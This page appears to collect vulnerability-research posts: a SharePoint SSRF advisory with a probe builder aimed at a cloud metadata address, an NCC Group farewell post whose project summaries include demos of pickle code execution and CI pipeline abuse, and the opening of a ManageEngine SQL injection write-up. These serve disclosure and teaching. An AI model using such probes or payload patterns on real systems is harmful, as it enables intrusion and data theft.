29 November 2022 — Vulnerability Research

A Ride on the Wild Side with Hacking Heavyweight Sick Codes

29 November 2022 at 18:16
Beverage of Choice: Krating Daeng (Thai Red Bull). Industry Influencer He Admires: Casey John Ellis. What did you want to be when you grew up? A physician, and he nearly became one. Hobbies (Present & Past): Motorcycling & Australian Football. Bucket List: Continuing to discover new software. Fun Fact: He currently has 2,000 tabs open. “People keep …


Before yesterday — Vulnerability Research

Microsoft SharePoint Server Post-Authentication Server-Side Request Forgery vulnerability

25 October 2022 at 00:00
Overview Disclaimer: No anime characters or animals were harmed during the research. The bug has been fixed, but it did not meet the criteria required to receive a CVE. Recently, we found a Server-Side Request Forgery (SSRF) vulnerability in Microsoft SharePoint Server 2019 which allows remote authenticated users to send HTTP(S) requests to arbitrary URLs and read the responses. The endpoint <site>/_api/web/ExecuteRemoteLOB is vulnerable to SSRF, and the HTTP(S) request is highly customizable in its method, path, headers, and body.
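As a rough illustration of the attack surface, the sketch below builds a probe for the vulnerable endpoint. The endpoint path comes from the advisory above; the payload field names ("url", "method", "headers", "body") are assumptions for illustration, since this excerpt does not document the exact request schema.

```python
# Hypothetical SSRF probe builder for the endpoint described above.
# The endpoint path is from the advisory; the payload field names are
# assumed for illustration, not taken from the real request schema.

def build_ssrf_probe(site, target_url, method="GET", headers=None, body=""):
    """Return the vulnerable endpoint URL and a candidate payload."""
    endpoint = f"{site}/_api/web/ExecuteRemoteLOB"
    payload = {
        "url": target_url,         # attacker-chosen URL (the SSRF target)
        "method": method,          # per the advisory, the method is controllable
        "headers": headers or {},  # per the advisory, headers are controllable
        "body": body,              # per the advisory, the body is controllable
    }
    return endpoint, payload

# A classic internal target: a cloud instance metadata service.
endpoint, payload = build_ssrf_probe(
    "https://sharepoint.example.com/sites/test",
    "http://169.254.169.254/latest/meta-data/",
)
```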

So long and thanks for all the 0day

23 November 2022 at 19:52

Nearly four years into my role, I am stepping down as NCC Group’s SVP & Global Head of Research. In part just for myself, to reflect on a whirlwind few years, and in part as a thank you to and celebration of all of the incredible researchers with whom I have had the privilege of working, I’m writing this post to share a few reflections.

I am proud of what we have accomplished together. First of all, we survived a global pandemic and somehow managed to publish any security research at all, despite how profoundly this affected so many of us. And it amazes me to say that in fact, across a team of several hundred technical security consultants globally, we’ve published over 600 research publications (research papers, technical blog posts, technical advisories/CVEs, conference talks, and open-source tool releases) since 2019, including releasing well over 60 open-source security tools, and presenting around 150 conference presentations at venues including Black Hat USA, Shmoocon, ACM CCS, Hardwear.io, REcon, IEEE Security & Privacy, Appsec USA, Toorcon, Oracle Code One, BSidesLV, O’Reilly Artificial Intelligence, Chaos Communication Congress, Microsoft BlueHat, HITB Amsterdam, RSA Conference, Ekoparty, CanSecWest, the Linux Foundation Member Summit, DEF CON, and countless others. We won awards, served on advisory boards, hacked drones out of the sky, served on Review Boards of top venues including USENIX WOOT and Black Hat USA, and our research has been covered by media outlets around the world, including Wired, Forbes, The New York Times, Bloomberg, Ars Technica, Politico, DarkReading, Techcrunch, Fast Company, the Wall Street Journal, VICE, and hundreds of other mainstream and trade publications globally.

More importantly, we have: 

  • Watched many researchers graduate from their time at NCC Group to do ever more amazing things, some of whom found their calling through performing their very first research projects within our research program
  • Patched countless vulnerabilities through collaboration with vendors, and sometimes from just writing the patches ourselves
  • Demonstrated the commercial viability of highly specialized security consulting practices driven forward ever further through an intense investment in R&D
  • Advocated and educated for a better (more secure, equitable, privacy-respecting) world through demonstrating the risks and defining the mitigations to critical problems in security & privacy, working with journalists including our numerous collaborations with Which?, and through related policy work like educating US Congressional staffers and testifying before UK Parliament
  • Supported countless researchers to get their first CVEs, publish their first blog posts, overcome fears, get onstage for the first time at Black Hat, and otherwise face the great unknown standing between themselves and their dreams

And I hope that it has been tremendously worthwhile.

Part 1: On leading a security research team

At NCC Group, our approach to security research has been and will continue to be, I think, somewhat unique within our industry. We do not have a small team of full-time researchers we invest in and put on display as evidence of the firm’s broader capability – rather, all of our researchers are seconded to research part-time from their consulting or internal development roles. We are all peers, where people doing their first-ever security research project have equal access to research time and other investment as do established, world-class researchers.

We deliberately resist the trope of the “brilliant asshole,” knowing full well that rockstar-ism and disrespect destroy the type of culture which enables the kind of intellectual risk-taking that security research requires. (Besides – the most talented people I’ve met in my career tend to also be the most humble and kind). 

From my experiences over the past four years, here are a few other things I believe to be true: 

  • Confidence is a skill. A lot of talent is lost to the world for want of a little courage, and sometimes a single comment or experience can change someone’s career forever. As leaders, the greatest gift we can give the people we manage is the skill of confidence – that is, the unshakable belief in someone that they can handle whatever challenges lie before them, and that they are in a safe enough environment that they know where to turn if they find themselves overwhelmed. 
  • We all have an inner critic, but our inner critic is usually wrong. One of my most meaningful memories from my time in this role was at Black Hat/DEF CON/BSidesLV in 2019, where we had over 20 speakers from NCC Group presenting their research. Over half of those researchers confessed to me at some moment leading up to their talks, their feelings of self-doubt, insecurity, or fear. I was grateful to be that person for them, but heartbroken to hear so many talented people question the worth of their work, and sometimes even of themselves. Those speakers universally went on to give excellent talks that were well-received. The lessons here, I think, are both that (1) even the experienced speakers you admire at the best venues in the industry still have moments of imposter syndrome, and thus that, (2) our inner critic tends to be wrong and we should do our best to feel the fear and do things anyway.
  • We are better together. Nothing helps us workshop new ideas and dare to try difficult things like having a trusted community who can share their expertise, give a different perspective, and mentor each other to help us grow. 
  • Elitist gatekeeping holds us all back. There are a number of things our industry needs to stop doing, and most of them are “gatekeeping.” Stop preventing interdisciplinary research and hackily attempting to reinvent other fields. Stop forgetting to give credit to those who did something before you, especially when those people aren’t yet well-known in our industry and it’s easiest to diminish their contributions. Stop making people feel more ashamed to ask a question than to pretend they know something they do not. Stop scaring away new contributors for not having achieved RCE before they started kindergarten. Stop blaming users for not being infosec professionals. Which brings me to my next point….. 
  • Infosec is more meritocratic for some than others. While most of our industry is awesome, there are still people who assume their female peers or leaders are junior, non-technical, or from the Marketing department (which is also a gendered disservice to men in the Marketing department!). Underrepresented people continue to face a disproportionate amount of condescension and exclusion which in turn can make them less likely to submit their talks to CFPs, contribute to OSS, publish their research, or apply for jobs. This barrage of discouragement meaningfully affects individuals, and can even lead to their departure from our industry. Even if CVE allocation and tier-1 conference talk acceptances are agnostic to things like race and gender, the systemic and cultural obstacles edging underrepresented people out of our industry one unwelcoming conversation at a time are not. This needs to be acknowledged if we hope to change it. 
  • Radical inclusivity breeds technical prowess. People do not take intellectual risks (or even ask questions) in environments in which they do not feel psychologically safe. By creating a deliberate culture of warmth, respect, and inclusion of all skill levels and backgrounds, we can take technical and intellectual risks together, view constructive feedback from others as a gift, experiment without necessarily coupling “failure” with “shame,” and accomplish things we’d otherwise dare not try.
  • Bold attempts should be rewarded. At NCC Group, we pay bonuses for achievement in research. For the last few years, we have had several different categories for “achievement,” and you only need to satisfy one of them to qualify for an award. One of the categories under which someone can qualify for one of these bonuses is, “Difficulty, Audacity, and Effort.” We know that trying something difficult is a risk with huge potential upside, but the downside is that it may fail. We have tried to help “own” that risk with our researchers by rewarding valiant efforts to do hard things, even when those things crash and burn. And I think, we’ve been better for it. 

Part 2: A few of my favourite projects (2018-2022)

In the last few years we’ve published well over 600 research talks, blogs, papers, tools, and advisories. You can read about every single thing we published in 2020 and 2021 in our corresponding Annual Research Reports. Some of the earlier work has, through no fault of our own, unfortunately been lost to the sands of time.

Here, I’ll just share a few (okay, more than a few) of my very favourite things from my time at NCC Group by a number of talented consultants and researchers, past and present. Admittedly, there have been a lot of great projects and this is at best a pseudorandom sample of fond memories. Most of the things below are research projects, but some of them are interesting initiatives we’ve worked on inside or outside NCC Group, not to mention our many publicly-reported security audits of critical software and hardware, and the creation and rapid growth of our Commercial Research division.

  • Assessing Unikernel Security (Spencer Michaels & Jeff Dileo, 2019) 
    The “Infinite Jest” of unikernel security whitepapers, this 104-page monstrosity performed a necessary security deep-dive into unikernels – single-address-space machine images constructed by treating component applications and drivers like libraries and compiling them, along with a kernel and a thin OS layer, into a single binary blob. It challenged the idea that unikernels’ smaller codebases and lack of excess services necessarily imply security, demonstrating through study of the major unikernels Rumprun and IncludeOS that, instead, everything old was new again: now-canonical mitigations like ASLR, W^X, stack canaries, and heap integrity checks are either completely absent or seriously flawed. The authors furthermore reasoned that if an application running on such a system contains a memory corruption vulnerability, it is often possible for attackers to gain code execution, even in cases where the application’s source and binary are unknown. Worse yet, because the application and the kernel run together as a single process, an attacker who compromises a unikernel can immediately exploit functionality that would require privilege escalation on a regular OS, e.g. arbitrary packet I/O.

  • The 9 Lives of Bleichenbacher’s CAT: New Cache ATtacks on TLS Implementations (David Wong & external collaborators Eyal Ronen, Robert Gillham, Daniel Genkin, Adi Shamir, & Yuval Yarom, IEEE S&P 2019)
    This phenomenal paper showed that despite 20 years of earnest attempts at patching Bleichenbacher-style padding oracle attacks against RSA implementations of the PKCS #1 v1.5 standard, many implementations are still vulnerable to leakage through novel microarchitectural side channels. In particular, the authors describe and demonstrate Cache-like ATtacks (CATs), enabling downgrade attacks against any TLS connection to a vulnerable server, recovering all 2048 bits of the RSA plaintext, and breaking the security of 7 out of 9 popular implementations of TLS. 
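To make the attack's foundation concrete, here is a minimal, purely illustrative sketch of the PKCS #1 v1.5 conformance check at the heart of Bleichenbacher-style attacks: any observable difference in how an implementation treats conforming versus non-conforming blocks – even a cache-timing difference, as in the CAT paper – hands the attacker a decryption oracle.

```python
def pkcs1_v15_conforming(em):
    """Return True iff `em` is a conforming PKCS #1 v1.5 encryption block:
    0x00 0x02 || at least 8 non-zero padding bytes || 0x00 || message."""
    if len(em) < 11 or em[0] != 0x00 or em[1] != 0x02:
        return False
    try:
        sep = em.index(0x00, 2)   # first zero byte after the header
    except ValueError:
        return False
    return sep >= 10              # guarantees >= 8 non-zero padding bytes

# A conforming block "leaks" valid; corrupting one header byte leaks invalid.
good = bytes([0x00, 0x02]) + b"\x7f" * 8 + b"\x00" + b"secret"
assert pkcs1_v15_conforming(good)
assert not pkcs1_v15_conforming(b"\x00\x01" + good[2:])
```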

  • Practical Attacks on Machine Learning Systems (Chris Anley, 2022)
    This wide-ranging paper by NCC Group’s Chief Scientist, Chris Anley, discusses real-world attack classes possible against machine learning systems. In it, he reminds us that “models are code,” demonstrating vulnerabilities and attacks related to Python pickle files, PyTorch’s PT and State Dictionary formats, a Keras H5 Lambda layer exploit, TensorFlow, and Apache MXNet, to name a few. He also reproduces a number of existing results from the machine learning attack literature, and presents a taxonomy of attacks on machine learning systems including malicious models, data poisoning, adversarial perturbation, training data extraction, model stealing, “masterprints,” inference by covariance, DoS, and model repurposing. Critically, he reminds us that in addition to all of these novel attack types specific to AI/ML, traditional hacking techniques still work on these systems too – discussing the problems of credentials in code, dependency risks, and webapp vulnerabilities like SQL injection – of course, an evergreen topic for Chris 🙂
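The “models are code” point can be demonstrated in a few lines. The sketch below is a benign stand-in for the pickle-based attacks such papers cover: unpickling an untrusted “model file” executes attacker-chosen code.

```python
import pickle

executed = []

def record(tag):
    executed.append(tag)

class MaliciousModel:
    def __reduce__(self):
        # Tells pickle: "to rebuild this object, call record('pwned')".
        # Deserialization therefore runs an attacker-chosen callable --
        # os.system would work just as well as our benign record().
        return (record, ("pwned",))

blob = pickle.dumps(MaliciousModel())   # what a poisoned "model file" contains
pickle.loads(blob)                      # "loading the model" runs the payload
assert executed == ["pwned"]
```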

  • Sinking U-Boots with Depthcharge (Jon Szymaniak, Hardwear.io 2020)
    An extensible Python 3 toolkit designed to aid security researchers when analyzing a customized, product-specific build of the U-Boot bootloader. And on the topic of U-Boot, let us not forget Nicolas Guigo & Nicolas Bidron’s high- and critical-severity U-Boot vulnerabilities published in 2022.

  • Unpacking .pkgs: A look inside MacOS installer packages (Andy Grant, DEF CON 27)
    In this work, Andy studied the inner workings of MacOS installer packages and demonstrated where serious security issues can arise, including his findings of a number of novel vulnerabilities and how they can be exploited to elevate privileges and gain code/command execution.

  • ABSTRACT SHIMMER (CVE-2020-15257): Host Networking is root-Equivalent, Again (Jeff Dileo, 2020)
    In this work, Jeff discusses a vulnerability he found in containerd – a container runtime underpinning Docker and common Kubernetes configurations – which resulted in full root container escape for a common container configuration. The technical advisory and proof-of-concept can be found here.
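The underlying mechanism is easy to demonstrate. Linux “abstract namespace” unix sockets (names beginning with a NUL byte) live outside the filesystem, so no file permissions guard them; any process in the same network namespace can connect. containerd-shim exposed its API over such a socket, which host-networked containers could therefore reach. A minimal, Linux-only sketch, with a made-up socket name:

```python
import socket

NAME = "\0demo-abstract-shimmer"        # leading NUL = abstract namespace

server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
server.bind(NAME)                       # no filesystem node is created
server.listen(1)

client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
client.connect(NAME)                    # no permission check beyond the netns
conn, _ = server.accept()
client.sendall(b"hello shim")
assert conn.recv(32) == b"hello shim"   # any same-netns process could do this
for s in (conn, client, server):
    s.close()
```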

  • Co-founding the Open Source Security Foundation (Jennifer Fernick, 2020-present)
    In February 2020, a small group of us across the industry founded the Open Source Security Coalition, with the goal of bringing people from across our industry together to improve the security of the open source ecosystem in a collaborative way, enabling impact-prioritized investment of time and funding toward the most critical and impactful efforts to help secure OSS. In August 2020, this became OpenSSF and moved into its more well-resourced home within the Linux Foundation. Since then, we’ve advised Congressional staffers about supply chain security, which supported the greater work of OpenSSF at the White House Open Source Security Summit. Together with David Wheeler, I also had the privilege of presenting a 2021 Linux Foundation Member Summit Keynote on Securing Open Source Software, which can be viewed here, as well as a talk aimed at security researchers at BHUSA with Christopher Robinson. In May 2022, on the heels of the second OSS Security Summit in DC, we announced the Open Source Software Security Mobilization plan, a $150 million, 10-point plan to radically improve the security of open-source software. In this, I wrote both a proposal for Conducting Third-Party Code Reviews (& Remediation) of up to 200 of the Most-Critical OSS Components (Stream 7, pages 38-40) with Amir Montazery of OSTIF, as well as a proposal for a vendor-neutral Open Source Security Incident Response Team (now called OSS-SIRT, in Stream 5, pages 30-33) which is now being led by the inimitable CRob of Intel.

  • There’s A Hole In Your SoC: Glitching The MediaTek BootROM (Jeremy Boone & Ilya Zhuravlev, 2020)
    In this work, Jeremy & Ilya (who was, incredibly, an intern at the time) uncovered an unpatchable vulnerability in the MediaTek MT8163V system-on-a-chip (64-bit ARM Cortex-A), and were able to reliably glitch it to bypass signature verification of the preloader, circumventing all secure boot functionality and thus completely breaking the hardware root of trust. What’s worse, they have reason to believe this affects other MediaTek chipsets due to a shared BootROM-to-preloader execution flow, likely implying that the vulnerability affects a wide variety of embedded devices such as tablets, smartphones, home networking products, and a range of IoT devices.

  • There’s Another Hole In Your SoC: Unisoc ROM Vulnerabilities (Ilya Zhuravlev, 2022)
    In this follow-up to Ilya’s previous work, he studied the security of the UNISOC platform’s boot chain, uncovering several unpatchable vulnerabilities in the BootROM which could persistently undermine secure boot. These vulnerabilities could even, for example, be exploited by malicious software which previously escalated its privileges in order to insert a persistent undetectable backdoor into the boot chain. These chips are used across many budget Android phones including some of the recent models produced by Samsung, Motorola and Nokia.

  • On Linux Random Number Generation (Thomas Pornin, 2019)
    Wherein Thomas made an unforgettable case for why monitoring entropy levels on Linux systems is not very useful.

  • Our research partnership with University College London
    Every year, as a part of our research partnership with UCL’s Centre for Doctoral Training in Data-Intensive Science, we work with a small group of high energy physics and astrophysics PhD students to apply machine learning to a domain-specific problem in cybersecurity. For example, in 2020, we explored deepfake capabilities and mitigation strategies. In 2021, we sought to understand the efficacy of various machine learning primitives for static malware analysis. In 2022, we challenged the students to study the effectiveness of using Generative Adversarial Networks (GANs) to improve fuzzing through preprocessing and other techniques (research paper forthcoming).

  • That time the Exploit Development Group successfully exploited the Lexmark MC3224i printer with a file write bug, as well as gaining code execution on the Western Digital PR4100 NAS at Pwn2own (Aaron Adams, Cedric Halbronn, & Alex Plaskett, 2021)

  • 10 real-world stories of how we’ve compromised CI/CD pipelines (Aaron Haymore, Iain Smart, Viktor Gazdag, Divya Natesan, & Jennifer Fernick, 2022)
    We’ve long believed that “CI/CD pipelines are execution engines.” In the past 5 years, we’ve demonstrated countless supply chain attacks in production CI/CD pipelines for virtually every company we’ve tested, with several dozen successful compromises of targets ranging from small businesses to Fortune 500 companies across almost every market and industry. In this blog post we shared 10 diverse examples of ways we’ve compromised development pipelines in real-world engagements with NCC Group clients, with hopes to illuminate the criticality of securing CI/CD pipelines amid our industry’s broader focus on supply-chain security. This blog post was expanded into a talk for BHUSA 2022, “RCE-as-a-Service: Lessons Learned from 5 Years of Real-World CI/CD Pipeline Compromise.”
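The “execution engines” claim is worth making concrete. The toy runner below uses an invented config format, but real systems (Jenkins, GitLab CI, GitHub Actions) share the essential property it illustrates: whoever can modify pipeline configuration can execute arbitrary code on the build host.

```python
import subprocess

pipeline = {
    "build": ["echo compiling the project"],
    # A malicious commit only needs to append one more step:
    "exfiltrate": ["echo uploading build secrets to attacker.example"],
}

def run_pipeline(config):
    """Execute every command the config asks for -- exactly like real CI."""
    output = []
    for stage, commands in config.items():
        for cmd in commands:
            # No boundary exists between "configuration" and "code":
            result = subprocess.run(cmd, shell=True,
                                    capture_output=True, text=True)
            output.append((stage, result.stdout.strip()))
    return output

results = run_pipeline(pipeline)
```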

  • Sleight of ARM: Demystifying Intel Houdini (Brian Hong, BHUSA 2021)
    In this work, Brian reverse engineered Intel’s proprietary Houdini binary translator which runs ARM binaries on x86, demonstrating security weaknesses it introduces into processes using it, showing the capability to do things like execute arbitrary ARM and x86, and write targeted malware that bypasses existing platform analysis for platforms used by hundreds of millions.

  • Why you should fear your mundane office equipment (Daniel Romero & Mario Rivas, DEF CON 27)
    With 35 novel vulnerabilities across 6 major printer manufacturers, this research demonstrated the risks that oft-overlooked networked devices can introduce into enterprises, making a case for how they present significant potential for exploitation and compromise by threat actors seeking to gain a persistent foothold on target organisations. Later work in 2022 by Alex Plaskett and Cedric Halbronn demonstrated remote, over-the-network exploitation of a Lexmark printer, with persistence across both firmware updates and reboots.

  • Finally releasing the long-awaited whitepaper for TriforceAFL (Tim Newsham & Jesse Hertz, 2017)
    Better late than never! Back in 2017, Tim Newsham and Jesse Hertz released TriforceAFL – an extension of the American Fuzzy Lop (AFL) fuzzer which supports full-system fuzzing using QEMU – but unfortunately the associated whitepaper for this work was never published. We did some archaeology around NCC and were happy to be able to release the associated paper a few months ago.

  • MacOS vulns including CVE-2020-9817 (Andy Grant, 2019-2020) 
    Andy found a privilege-escalation bug (CVE-2020-9817) in the macOS installer enabling arbitrary code execution with root privileges, effectively leading to a full system compromise. He also disclosed CVE-2020-3882, a bug in macOS enabling an attacker to retrieve semi-arbitrary files from a target victim’s macOS system using only a calendar invite, giving me an excellent excuse to never take a call again (or like, until patching) from my friend Andy Grant 🙂

  • Solitude: A privacy analysis tool (Dan Hastings & Emanuel Flores, Chaos Communication Congress 2020)
    After showing at DEF CON in 2019 that many mobile apps’ privacy policies are lying to us about the data they collect, Dan Hastings was worried about how users who are not themselves security researchers could better understand the privacy risks of their mobile apps. Solitude was created with those users in mind – specifically, this open source privacy analysis tool was created to empower users to conduct their own privacy investigations into where their private data goes once it leaves their web browser or mobile device, and is broadly extensible and configurable to study a wide range of data types across arbitrary mobile applications. This work was also presented to key end-user communities such as activists, journalists, and others at the human rights conference, RightsCon.

  • On the malicious use of large language models like GPT-3 (Jennifer Fernick, 2021)
    This blogpost explored the theoretical question of whether (and how) large language models like GPT-3 or their successors may be useful for exploit generation, and proposed an offensive security research agenda for large language models, based on a converging mix of existing experimental findings about privacy, learned examples, security, multimodal abstraction, and generativity (of novel output, including code) by large language models including GPT-3.

  • Critical vulnerabilities in prominent OSS cryptography libraries (Paul Bottinelli, 2021)
    Paul uncovered critical vulnerabilities enabling arbitrary forgery of ECDSA signatures in several open-source cryptography libraries – one with over 7.3M downloads in the previous 90 days on PyPI, and another with over 16,000 weekly downloads on npm.
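A recurring theme in this class of bug is a missing parameter range check: in at least some of the affected implementations, a degenerate signature such as (r = 0, s = 0) verified for any message and public key. A toy sketch of the missing guard, with the full curve arithmetic omitted:

```python
# Order of the secp256k1 group, used here as an example modulus n.
N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141

def signature_params_valid(r, s, n=N):
    """The range check SEC 1 requires before the verification equation."""
    return 1 <= r <= n - 1 and 1 <= s <= n - 1

# Without this guard, a degenerate "signature" like (0, 0) could be
# accepted regardless of the message being verified.
assert not signature_params_valid(0, 0)
assert signature_params_valid(12345, 67890)
```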

  • Command and KubeCTL: Real-World Kubernetes Security for Pentesters (Mark Manning, Shmoocon 2020) 
    In this talk and corresponding blog post, Mark explored Kubernetes offensive security across a spectrum of security postures and environments, demonstrating flaws and risks in each – those without regard to security, those with incomplete threat models, and seemingly well-secured clusters. This was a part of a larger body of work by Mark that made significant contributions to the security of k8s.

  • Wubes: Leveraging the Windows 10 Sandbox for Arbitrary Processes (Cedric Halbronn, 2021)
    Leveraging the Windows Sandbox, Cedric created a Qubes-like containerization for Microsoft Windows, enabling you to spawn applications in isolation. This means that if you browse a malicious site using Wubes, it won’t be able to infect your Windows host without additional chained exploits. Specifically, this means attackers need 1, 2, 3 and 4 below instead of just 1 and 2 in the case of Firefox:

    1) Browser remote code execution (RCE) exploit
    2) Local privilege exploit (LPE)
    3) Bypass of Code Integrity (CI)
    4) HyperV (HV) elevation of privilege (EoP)

  • Coinbugs: Enumerating Common Blockchain Implementation-Level Vulnerabilities (Aleksandar Kircanski & Terence Tarvis, 2020)
    This paper sought to offer an overview of the various classes of implementation-level security flaws that commonly arise in proof-of-work blockchains, studying the vulnerabilities found during the first decade of Bitcoin’s existence, with the dual-purpose of both offering a roadmap for security testers performing blockchain security reviews, as well as a reference for blockchain developers on common pitfalls. It enumerated 10 classes of blockchain-specific software flaws, introducing several novel bug classes alongside known examples in production blockchains.
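One classic member of these bug classes is transaction value overflow (cf. Bitcoin's 2010 “value overflow incident”). A hedged Python sketch, simulating the fixed-width arithmetic in which the bug arises:

```python
MASK64 = (1 << 64) - 1

def outputs_valid_naive(output_values, input_total):
    """Buggy check: the running sum wraps like a C uint64_t."""
    total = 0
    for v in output_values:
        total = (total + v) & MASK64   # 64-bit wraparound
    return total <= input_total

huge = (1 << 63) + 5
# Two huge outputs wrap past 2**64 and look like a total of only 10:
assert outputs_valid_naive([huge, huge], input_total=100)

MAX_MONEY = 21_000_000 * 10**8         # Bitcoin's supply cap, in satoshis

def outputs_valid_fixed(output_values, input_total):
    """Bound each value and the running sum before comparing."""
    total = 0
    for v in output_values:
        if not (0 <= v <= MAX_MONEY):
            return False
        total += v                     # Python ints do not wrap
        if total > MAX_MONEY:
            return False
    return total <= input_total

assert not outputs_valid_fixed([huge, huge], input_total=100)
```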

  • Rich Warren’s vulnerabilities in Pulse Connect Secure and Sonicwall (2020-2021)
    Rich Warren and David Cash initially published multiple vulnerabilities in Pulse Connect Secure VPN appliances including an arbitrary file read vulnerability (CVE-2020-8255), an injection vulnerability which can be exploited by an authenticated administrative user to execute arbitrary code as root (CVE-2020-8243), and an uncontrolled gzip extraction vulnerability to overwrite arbitrary files, resulting in RCE as root (CVE-2020-8260). Rich later found that this patch could be bypassed, resulting yet again in RCE (CVE-2021-22937). He later published a series of 6 advisories related to the SonicWall SMA 100 Series, yet again demonstrating systemic vulnerabilities in highly privileged network appliances. This seems to be a theme in our industry, and is highly concerning given major supply chain attack events on similar highly-privileged and ubiquitous network appliances in recent years. I believe it is essential that we continue to dig deeper into the security limitations of these types of devices.

  • F5 Networks Big IP threat intelligence (Research & Intelligence Fusion Team, July 2020)
    In this work, NCC Group’s RIFT team (led by folks including Ollie Whitehouse & Christo Butcher) published initial analysis of active exploitation NCC had observed of the CVSS 10.0 F5 Networks TMUI RCE vulnerability (CVE-2020-5902), which allows arbitrary, active interception of any traffic traversing an internet-exposed, unpatched Big-IP node. The vulnerability was initially used by threat actors to execute code; later exploitation involved staged attacks and web shells, bypassing mitigation attempts and yielding credentials, private keys, TLS certificates for load balancers, and more. Here is the Wired piece initially discussing this threat intel.

  • Breaking a class of binary obfuscation technologies (Nicolas Guigo, 2021)
    In this work Nico revealed tools and methods for reversing real-world binary obfuscation, effectively breaking one of the canonical mobile app obfuscation tools and demonstrating that breaking the protections offered by obfuscation tools probably costs attackers orders of magnitude fewer person-hours than our industry tends to assume. (Bonus points to Nico for sending me his epic initial demo for this set to Eric Prydz’ “Opus”)

  • Hardware-Backed Heist: Extracting ECDSA Keys from Qualcomm’s TrustZone (Keegan Ryan, ACM CCS 2019)
    This paper showed the susceptibility of TrustZone to sidechannel attacks allowing an attacker to gain insight into the microarchitectural behaviour of trusted code. Specifically, it demonstrated a series of novel vulnerabilities that leak sensitive cryptographic information through shared microarchitectural structures in Qualcomm’s implementation of Android’s hardware-backed keystore, allowing an attacker to extract sensitive information and fully recover a 256-bit ECDSA private key.

  • Popping Locks, Stealing Cars, and Breaking a Billion Other Things: Bluetooth LE Link Layer Relay Attacks (Sultan Qasim Khan, Hardwear.io NL 2022)
    The mainstream headline for this was something like, “we hacked a Tesla and drove away,” but the real headline was that Sultan created the world’s first link-layer relay attack on Bluetooth Low Energy – long hypothesized, but never before demonstrated – which by its very nature bypasses most existing relay attack mitigations. This story was originally published by Bloomberg but ended up covered by over 900 media outlets worldwide. The advisories for Tesla and BLE are here. This work reminds us that using technologies/protocols/standards for security purposes for which they were not designed can be dangerous. (Video source: Dan Goodin of Ars Technica.)
  • Hacking in Space (2022-2023)
    Okay, so, this is just a teaser for future work. Keep an eye on this, umm, space 🚀

Conclusion & greets

It feels so strange to say goodbye – we haven’t even released “Symphony of Shellcode” yet 😮  

I’m forever grateful to Dave Goldsmith, Nick Rowe, and Ollie Whitehouse for taking a chance on me and allowing me the unreal opportunity to lead such an esteemed technical team, and for the friendship and contributions of them and of many other technical leaders (past* and present) across NCC Group – not least, NCC Group’s Commercial Research Director and former UK/EU/APAC Research Director Matt Lewis, as well as Jeff Dileo, Jeremy Boone, Will Groesbeck, Kevin Dunn, Ian Robertson, Damian Archer*, Rob Wood, Javed Samuel, Chris Anley, Nick Dunn, Robert Seacord*, Richard Appleby, Timur Duehr, Daniel Romero, Iain Smart, Clint Gibler*, Spencer Michaels*, Drew Suarez*, Joel St John*, Ray Lai*, and Bob Wessen* – as well as our program coordinators Aaron Haymore* and R. Rivera, and the dozens (real talk: hundreds) of talented consultants with whom I’ve had the tremendous privilege of working. Thank you for justifying simultaneously both my deep existential fear that everything is hackable, and my hope that there are so many bright, ethically-minded people using all of their power to make things safer and more secure for us all.

And now, onto the next dream <3

CVE-2022-40300: SQL Injection in ManageEngine Privileged Access Management

In this excerpt of a Trend Micro Vulnerability Research Service vulnerability report, Justin Hung and Dusan Stevanovic of the Trend Micro Research Team detail a recently patched SQL injection vulnerability in Zoho ManageEngine products. The bug is due to improper validation of resource types in the AutoLogonHelperUtil class. Successful exploitation of this vulnerability could lead to arbitrary SQL code execution in the security context of the database service, which runs with SYSTEM privileges. The following is a portion of their write-up covering CVE-2022-40300, with a few minimal modifications.


ManageEngine recently patched a SQL injection vulnerability bug in their Password Manager Pro, PAM360, and Access Manager Plus products. The vulnerability is due to improper validation of resource types in the AutoLogonHelperUtil class. A remote attacker can exploit the vulnerability by sending a crafted request to the target server. Successful exploitation could lead to arbitrary SQL code execution in the security context of the database service, which runs with SYSTEM privileges.

The Vulnerability

Password Manager Pro is a secure vault for storing and managing shared sensitive information such as passwords, documents, and digital identities of enterprises. The product is also included in two other similar ManageEngine products: PAM360 and Access Manager Plus. A user can access the web console of these products through HTTPS requests via the following ports:

The HTTP request body may contain data of various types, indicated by the Content-Type header field. One of the standardized types is multipart, which contains various subtypes that share a common syntax. The most widely used subtype is multipart/form-data. A multipart/form-data body is made up of multiple parts, each of which contains a Content-Disposition header. The parts are separated by a string of characters defined by the boundary keyword found in the Content-Type header line. The Content-Disposition header contains parameters in “name=value” format. Additional header lines may be present in each part; each header line is separated by a CRLF sequence. The last header line is terminated by two consecutive CRLF sequences, and the form element’s data follows. The filename parameter in a Content-Disposition header provides a suggested file name to be used if the element's data is detached and stored in a separate file.
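
To make the layout concrete, the following sketch builds a minimal multipart/form-data body by hand (the boundary string and field values here are hypothetical, chosen only for illustration):

```python
# Build a minimal multipart/form-data body by hand (illustrative only;
# the boundary string and field values are hypothetical).
CRLF = "\r\n"
boundary = "----exampleBoundary1234"

def multipart_body(fields):
    """fields: list of (name, value) pairs."""
    parts = []
    for name, value in fields:
        parts.append("--" + boundary + CRLF)
        # Each part carries a Content-Disposition header with a name parameter.
        parts.append('Content-Disposition: form-data; name="%s"' % name + CRLF)
        # The last header line is terminated by two consecutive CRLF
        # sequences, then the element's data follows.
        parts.append(CRLF)
        parts.append(value + CRLF)
    parts.append("--" + boundary + "--" + CRLF)  # closing boundary marker
    return "".join(parts)

body = multipart_body([("TYPEID", "0"), ("resourceType", "Linux")])
print(body)
```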

A user with admin privileges can add or edit a resource type via the Password Manager Pro web interface by clicking the menu “Resources” -> “Resource Types” -> “Add” (or “Edit”), and an HTTP multipart/form-data request will be submitted to the “AddResourceType.ve” endpoint, as in the example shown below:

where several form-data parts are transferred in the request, such as “TYPEID”, “dnsname_label”, and “resLabChkName__1”. The data carried in the multipart/form-data part with a name parameter value of “resourceType” represents the name of the resource type, which is relevant to the vulnerability in this report.

